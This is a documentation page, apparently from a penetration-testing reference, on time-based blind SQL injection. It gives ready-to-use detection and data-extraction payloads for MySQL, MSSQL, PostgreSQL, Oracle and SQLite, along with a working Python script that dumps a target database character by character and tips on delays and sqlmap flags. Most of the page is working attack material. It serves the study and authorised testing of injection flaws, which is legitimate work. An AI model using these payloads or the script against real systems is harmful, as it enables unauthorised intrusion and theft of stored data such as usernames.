> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Time-Based Blind

> Time-based blind SQL injection: extract data through conditional time delays.

## Overview

No visible output difference. Inject conditional `SLEEP`/`WAITFOR` — measure response time to infer true/false. Slowest technique but works when boolean blind doesn't.

***

## Detect

### MySQL

```
' AND SLEEP(5)-- -                    → 5 sec delay = injectable
' AND IF(1=1,SLEEP(5),0)-- -         → 5 sec delay
' AND IF(1=2,SLEEP(5),0)-- -         → No delay
```

### MSSQL

```
'; WAITFOR DELAY '0:0:5'-- -         → 5 sec delay
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -
```

### PostgreSQL

```
'; SELECT pg_sleep(5)-- -
' AND (SELECT CASE WHEN 1=1 THEN pg_sleep(5) ELSE pg_sleep(0) END)-- -
```

### Oracle

```
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)-- -
```

### SQLite

```
' AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))-- -
```

***

## Extract Data — MySQL

### Database Length

```
' AND IF(LENGTH(database())=5,SLEEP(3),0)-- -
```

### Database Name

```
' AND IF(ASCII(SUBSTRING(database(),1,1))>100,SLEEP(3),0)-- -
' AND IF(ASCII(SUBSTRING(database(),1,1))=116,SLEEP(3),0)-- -
```

### Table Names

```
' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1))>100,SLEEP(3),0)-- -
```

### Dump Data

```
' AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 0,1),1,1))=97,SLEEP(3),0)-- -
```

***

## Extract Data — MSSQL

```
'; IF (ASCII(SUBSTRING(DB_NAME(),1,1))>100) WAITFOR DELAY '0:0:3'-- -
'; IF (ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>100) WAITFOR DELAY '0:0:3'-- -
```

***

## Extract Data — PostgreSQL

```
' AND (SELECT CASE WHEN ASCII(SUBSTRING(current_database(),1,1))>100 THEN pg_sleep(3) ELSE pg_sleep(0) END)-- -
```

***

## Automation Script (Python)

```python theme={"dark"}
import requests
import time

url = "http://TARGET/page"
result = ""

for pos in range(1, 50):
    low, high = 32, 126
    while low <= high:
        mid = (low + high) // 2
        payload = f"' AND IF(ASCII(SUBSTRING(database(),{pos},1))>{mid},SLEEP(2),0)-- -"
        start = time.time()
        r = requests.get(url, params={"id": payload})
        elapsed = time.time() - start
        if elapsed >= 2:
            low = mid + 1
        else:
            high = mid - 1
    if low > 126:
        break
    result += chr(low)
    print(f"[+] {result}")

print(f"Result: {result}")
```

***

## Tips

* Use 2-3 sec delay (not too long, not too short)
* Network latency can cause false positives — test baseline first
* Binary search reduces requests per character (\~7 vs \~95)
* Use `--technique=T --time-sec=3` in SQLmap

***

## Quick Reference

| Database   | Sleep Function                          |
| ---------- | --------------------------------------- |
| MySQL      | `SLEEP(N)` or `BENCHMARK(N,expr)`       |
| MSSQL      | `WAITFOR DELAY '0:0:N'`                 |
| PostgreSQL | `pg_sleep(N)`                           |
| Oracle     | `DBMS_PIPE.RECEIVE_MESSAGE('a',N)`      |
| SQLite     | `LIKE('ABC',UPPER(HEX(RANDOMBLOB(N))))` |

***

## Sources

* [PortSwigger — Blind SQL Injection](https://portswigger.net/web-security/sql-injection/blind)
* [OWASP — Blind SQL Injection](https://owasp.org/www-community/attacks/Blind_SQL_Injection)
* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
